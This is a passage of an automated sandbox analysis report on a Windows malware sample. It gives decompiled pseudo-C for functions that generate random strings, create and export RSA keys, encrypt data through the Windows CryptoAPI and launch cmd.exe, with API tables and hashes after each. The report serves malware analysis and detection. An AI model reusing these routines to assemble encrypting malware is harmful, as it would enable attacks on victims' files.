						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xf9e2a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xf9e2a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}













































                                        0x0f9d521c
                                        0x0f9d521e
                                        0x0f9d5228
                                        0x0f9d5230
                                        0x0f9d5233
                                        0x0f9d5233
                                        0x0f9d5239
                                        0x0f9d523f
                                        0x0f9d5244
                                        0x0f9d524f
                                        0x0f9d524f
                                        0x0f9d524b
                                        0x0f9d524b
                                        0x0f9d524b
                                        0x0f9d5251
                                        0x0f9d525e
                                        0x0f9d5264
                                        0x0f9d5266
                                        0x0f9d5385
                                        0x00000000
                                        0x0f9d526c
                                        0x0f9d526c
                                        0x0f9d5271
                                        0x0f9d5279
                                        0x0f9d527c
                                        0x0f9d527f
                                        0x0f9d5285
                                        0x0f9d5289
                                        0x0f9d5293
                                        0x0f9d529f
                                        0x0f9d52a4
                                        0x0f9d52ab
                                        0x0f9d52c9
                                        0x0f9d52d7
                                        0x0f9d52df
                                        0x0f9d52e2
                                        0x0f9d52e5
                                        0x0f9d52eb
                                        0x0f9d52f4
                                        0x0f9d538d
                                        0x0f9d5392
                                        0x0f9d5393
                                        0x0f9d5394
                                        0x0f9d5395
                                        0x0f9d5396
                                        0x0f9d5397
                                        0x0f9d5398
                                        0x0f9d5399
                                        0x0f9d539a
                                        0x0f9d539b
                                        0x0f9d539c
                                        0x0f9d539d
                                        0x0f9d539e
                                        0x0f9d539f
                                        0x0f9d53a6
                                        0x0f9d53a7
                                        0x0f9d53a8
                                        0x0f9d53b7
                                        0x0f9d53bf
                                        0x0f9d53c9
                                        0x0f9d53cc
                                        0x0f9d53eb
                                        0x0f9d53ed
                                        0x0f9d53f0
                                        0x0f9d53f3
                                        0x0f9d5404
                                        0x0f9d540a
                                        0x0f9d540d
                                        0x0f9d540f
                                        0x0f9d541a
                                        0x0f9d5420
                                        0x0f9d5423
                                        0x0f9d5425
                                        0x0f9d5427
                                        0x0f9d5427
                                        0x0f9d542b
                                        0x0f9d542e
                                        0x0f9d5435
                                        0x0f9d5437
                                        0x0f9d543a
                                        0x0f9d5440
                                        0x0f9d5442
                                        0x0f9d5444
                                        0x0f9d5446
                                        0x0f9d5446
                                        0x0f9d5449
                                        0x0f9d5453
                                        0x0f9d544b
                                        0x0f9d544b
                                        0x0f9d544d
                                        0x0f9d544e
                                        0x0f9d544e
                                        0x0f9d5458
                                        0x0f9d5459
                                        0x0f9d545f
                                        0x0f9d5464
                                        0x0f9d5464
                                        0x0f9d5446
                                        0x0f9d546b
                                        0x0f9d5471
                                        0x0f9d5474
                                        0x0f9d5474
                                        0x0f9d547a
                                        0x0f9d547a
                                        0x0f9d5481
                                        0x0f9d5481
                                        0x0f9d549b
                                        0x0f9d52fa
                                        0x0f9d52fa
                                        0x0f9d52ff
                                        0x0f9d5306
                                        0x0f9d5309
                                        0x0f9d530c
                                        0x0f9d5313
                                        0x0f9d531a
                                        0x0f9d532a
                                        0x0f9d5333
                                        0x0f9d5337
                                        0x0f9d533b
                                        0x0f9d533b
                                        0x0f9d5337
                                        0x0f9d5347
                                        0x0f9d534e
                                        0x0f9d5356
                                        0x0f9d5358
                                        0x0f9d5358
                                        0x0f9d535f
                                        0x0f9d5367
                                        0x0f9d5367
                                        0x0f9d5369
                                        0x0f9d536c
                                        0x0f9d5376
                                        0x0f9d5384
                                        0x0f9d5384
                                        0x0f9d52f4

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0F9D5222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F9D525E
                                        • _memset.LIBCMT ref: 0F9D52AB
                                        • lstrlenA.KERNEL32(?), ref: 0F9D52BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0F9D5324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0F9D532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0F9D533B
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5356
                                        • HeapFree.KERNEL32(00000000), ref: 0F9D5367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5376
                                        • GetLastError.KERNEL32 ref: 0F9D5385
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                          • Part of subcall function 0F9D5190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                          • Part of subcall function 0F9D5190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                          • Part of subcall function 0F9D5190: wsprintfW.USER32 ref: 0F9D51D9
                                          • Part of subcall function 0F9D5190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                          • Part of subcall function 0F9D5190: ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction ID: cd4991fc8194d4aa471413fed75ff32b5195dccf4f5fbfb1cdcb4ee1be2f606e
                                        • Opcode Fuzzy Hash: cfa8315b72d8639660257b935eb3bcbf1aad53b2cf44e388a7e2ab260f820f3e
                                        • Instruction Fuzzy Hash: 5B41F631A05215ABEB209BA4DC44BEFBB7CEF49711F244114F905E3282DB789950CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D8150 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111encryptionlibrarymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E0F9D8150(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						goto L15;
					}
				}
			}


























                                        0x0f9d8160
                                        0x0f9d8162
                                        0x0f9d8167
                                        0x0f9d816a
                                        0x0f9d816d
                                        0x0f9d8175
                                        0x0f9d8269
                                        0x0f9d8271
                                        0x0f9d817b
                                        0x0f9d817b
                                        0x0f9d8180
                                        0x0f9d8180
                                        0x0f9d8183
                                        0x0f9d8188
                                        0x0f9d8189
                                        0x0f9d8195
                                        0x0f9d8195
                                        0x0f9d81a1
                                        0x0f9d81a5
                                        0x0f9d8277
                                        0x0f9d8285
                                        0x0f9d8293
                                        0x0f9d81b3
                                        0x0f9d81b6
                                        0x0f9d81be
                                        0x0f9d81c5
                                        0x0f9d81cc
                                        0x0f9d81d2
                                        0x0f9d81d6
                                        0x0f9d81dd
                                        0x0f9d81e4
                                        0x0f9d81eb
                                        0x0f9d81ef
                                        0x0f9d81f7
                                        0x0f9d8207
                                        0x0f9d8207
                                        0x0f9d820c
                                        0x0f9d8214
                                        0x00000000
                                        0x0f9d8216
                                        0x0f9d8216
                                        0x0f9d8217
                                        0x0f9d8218
                                        0x0f9d821f
                                        0x00000000
                                        0x0f9d8221
                                        0x0f9d8221
                                        0x0f9d8225
                                        0x0f9d8227
                                        0x0f9d822a
                                        0x0f9d8231
                                        0x0f9d8235
                                        0x0f9d823e
                                        0x0f9d8242
                                        0x0f9d8243
                                        0x0f9d8231
                                        0x0f9d8247
                                        0x0f9d8247
                                        0x0f9d821f
                                        0x0f9d81f9
                                        0x0f9d81f9
                                        0x0f9d81fd
                                        0x0f9d8205
                                        0x0f9d824e
                                        0x0f9d824e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d8205
                                        0x0f9d8255
                                        0x0f9d8263
                                        0x00000000
                                        0x0f9d8263
                                        0x0f9d81a5

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                        • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8277
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction ID: da1cbb7ee9285fb786599efd7a496e4bd1b62b50363972ba320919c10a7655e4
                                        • Opcode Fuzzy Hash: 217b79c387d5fa74c61f79f8b531a21c3491a706a9592a5d4fc057d931616994
                                        • Instruction Fuzzy Hash: BC31F874A05209ABEB208FE5DC49BEEBB7CEF05751F308069FA01E6182D7749621CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D82A0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96encryptionlibrarymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E0F9D82A0(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}























                                        0x0f9d82b0
                                        0x0f9d82b2
                                        0x0f9d82b7
                                        0x0f9d82bd
                                        0x0f9d82c0
                                        0x0f9d82c8
                                        0x0f9d8392
                                        0x0f9d839a
                                        0x0f9d82ce
                                        0x0f9d82ce
                                        0x0f9d82d0
                                        0x0f9d82d0
                                        0x0f9d82d3
                                        0x0f9d82d7
                                        0x0f9d82d8
                                        0x0f9d82e4
                                        0x0f9d82ee
                                        0x0f9d82f2
                                        0x0f9d83a0
                                        0x0f9d83ae
                                        0x0f9d83bc
                                        0x0f9d8301
                                        0x0f9d8304
                                        0x0f9d830c
                                        0x0f9d8313
                                        0x0f9d831a
                                        0x0f9d8320
                                        0x0f9d8324
                                        0x0f9d832b
                                        0x0f9d8332
                                        0x0f9d8339
                                        0x0f9d833d
                                        0x0f9d8345
                                        0x0f9d8355
                                        0x0f9d8355
                                        0x0f9d835a
                                        0x0f9d8362
                                        0x0f9d836d
                                        0x0f9d8376
                                        0x0f9d8376
                                        0x0f9d8347
                                        0x0f9d8347
                                        0x0f9d834b
                                        0x0f9d8353
                                        0x00000000
                                        0x00000000
                                        0x0f9d8353
                                        0x0f9d837e
                                        0x0f9d838c
                                        0x00000000
                                        0x0f9d838c
                                        0x0f9d82f2

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                        • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                        • GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                        • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                        • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                        • API String ID: 3996966626-2152921537
                                        • Opcode ID: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction ID: 210382d2c5051aeefabdf87173a93d34e64520cb74e5883e852665db8d95455a
                                        • Opcode Fuzzy Hash: 1acb6d514d3d6e8ef9ad942e6a13a0f4b5f68ffa94ae3dabd409e1b26e424e1c
                                        • Instruction Fuzzy Hash: 3B31F871A05209AFEB20DFA5DC49BEEBB7CEF05711F204059F605E2182D7789A20CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D6530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E0F9D6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xf9e2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0F9D34F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xf9e2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}














                                        0x0f9d653b
                                        0x0f9d6541
                                        0x0f9d6548
                                        0x0f9d655a
                                        0x0f9d655e
                                        0x0f9d6566
                                        0x0f9d659e
                                        0x0f9d659e
                                        0x0f9d65c1
                                        0x0f9d65c3
                                        0x0f9d65cc
                                        0x0f9d65da
                                        0x0f9d65e0
                                        0x0f9d65e6
                                        0x0f9d65f4
                                        0x0f9d6602
                                        0x0f9d6608
                                        0x0f9d6611
                                        0x0f9d6618
                                        0x0f9d661d
                                        0x0f9d661d
                                        0x0f9d6618
                                        0x0f9d6628
                                        0x0f9d6633
                                        0x00000000
                                        0x0f9d6639
                                        0x0f9d6568
                                        0x0f9d6573
                                        0x00000000
                                        0x0f9d6597
                                        0x0f9d6584
                                        0x0f9d658c
                                        0x00000000
                                        0x0f9d6595
                                        0x00000000

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D65B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0F9D3724,0000000A,00000000,?,0F9D3724,00000000), ref: 0F9D65DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0F9D3724,?,0F9D3724,00000000), ref: 0F9D6602
                                        • GetLastError.KERNEL32(?,0F9D3724,00000000), ref: 0F9D660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0F9D3724,00000000,00000000), ref: 0F9D6628
                                        • LeaveCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000), ref: 0F9D6633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction ID: b93ff390acc2f02cb71f1f880095a8752a233601122ff60c9f66d648c7cb098d
                                        • Opcode Fuzzy Hash: 640c6eda210cbc1d863902ec381ea2714d88c1b32a177602f3890782522d60d0
                                        • Instruction Fuzzy Hash: 52314F75A44309BFEB20CFA0DD45FEE77B8AB49701F608548F601AA1C1DB79A660CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D62B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0F9D62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}









                                        0x0f9d62c1
                                        0x0f9d62c5
                                        0x0f9d62cd
                                        0x0f9d6305
                                        0x0f9d6313
                                        0x0f9d6317
                                        0x0f9d631f
                                        0x0f9d631f
                                        0x0f9d6322
                                        0x0f9d633b
                                        0x0f9d6353
                                        0x0f9d635d
                                        0x0f9d6369
                                        0x0f9d637e
                                        0x00000000
                                        0x0f9d6384
                                        0x0f9d62cf
                                        0x0f9d62da
                                        0x00000000
                                        0x0f9d62fe
                                        0x0f9d62eb
                                        0x0f9d62f3
                                        0x00000000
                                        0x0f9d62fc
                                        0x00000000

                                        APIs
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F9D49C6,?,0F9D49CE), ref: 0F9D62C5
                                        • GetLastError.KERNEL32(?,0F9D49CE), ref: 0F9D62CF
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D49CE), ref: 0F9D62EB
                                        • CryptGenKey.ADVAPI32(0F9D49CE,0000A400,08000001,?,?,0F9D49CE), ref: 0F9D6317
                                        • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F9D633B
                                        • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F9D6353
                                        • CryptDestroyKey.ADVAPI32(?), ref: 0F9D635D
                                        • CryptReleaseContext.ADVAPI32(0F9D49CE,00000000), ref: 0F9D6369
                                        • CryptAcquireContextW.ADVAPI32(0F9D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F9D637E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
